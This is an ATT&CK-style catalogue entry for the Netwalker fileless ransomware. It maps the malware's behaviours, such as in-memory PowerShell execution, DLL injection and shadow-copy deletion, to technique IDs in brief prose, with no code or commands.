Skip to content

S0457 Netwalker

Netwalker is fileless ransomware written in PowerShell and executed directly in memory.1

Item Value
ID S0457
Associated Names
Type MALWARE
Version 1.1
Created 26 May 2020
Last Modified 22 March 2023
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Netwalker has been written in PowerShell and executed directly in memory, avoiding detection.12
enterprise T1059.003 Windows Command Shell Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.2
enterprise T1486 Data Encrypted for Impact Netwalker can encrypt files on infected machines to extort victims.1
enterprise T1140 Deobfuscate/Decode Files or Information Netwalker‘s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.2
enterprise T1562 Impair Defenses -
enterprise T1562.001 Disable or Modify Tools Netwalker can detect and terminate active security software-related processes on infected systems.12
enterprise T1105 Ingress Tool Transfer Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.2
enterprise T1490 Inhibit System Recovery Netwalker can delete the infected system’s Shadow Volumes to prevent recovery.12
enterprise T1570 Lateral Tool Transfer Operators deploying Netwalker have used psexec to copy the Netwalker payload across accessible systems.2
enterprise T1112 Modify Registry Netwalker can add the following registry entry: HKEY_CURRENT_USER\SOFTWARE{8 random characters}.1
enterprise T1106 Native API Netwalker can use Windows API functions to inject the ransomware DLL.1
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.009 Embedded Payloads Netwalker‘s DLL has been embedded within the PowerShell script in hex format.1
enterprise T1027.010 Command Obfuscation Netwalker‘s PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables.12
enterprise T1055 Process Injection -
enterprise T1055.001 Dynamic-link Library Injection The Netwalker DLL has been injected reflectively into the memory of a legitimate running process.1
enterprise T1489 Service Stop Netwalker can terminate system processes and services, some of which relate to backup software.1
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery Netwalker can detect and terminate active security software-related processes on infected systems.1
enterprise T1082 System Information Discovery Netwalker can determine the system architecture it is running on to choose which version of the DLL to use.1
enterprise T1569 System Services -
enterprise T1569.002 Service Execution Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.2
enterprise T1047 Windows Management Instrumentation Netwalker can use WMI to delete Shadow Volumes.1

References